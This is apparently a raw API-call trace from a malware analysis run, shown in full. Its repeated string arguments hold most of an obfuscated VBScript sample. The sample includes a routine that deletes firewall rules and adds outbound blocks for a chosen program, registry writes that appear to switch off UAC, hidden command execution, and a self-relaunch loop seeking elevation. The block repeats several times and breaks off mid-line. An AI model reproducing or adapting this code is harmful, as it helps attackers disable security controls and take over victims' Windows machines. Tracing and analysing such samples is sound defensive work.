bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.344] wcsncmp (_String1="ule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.344] wcsncmp (_String1="le in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.344] wcsncmp (_String1="e in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.344] wcsncmp (_String1=" in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.344] wcsncmp (_String1="in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 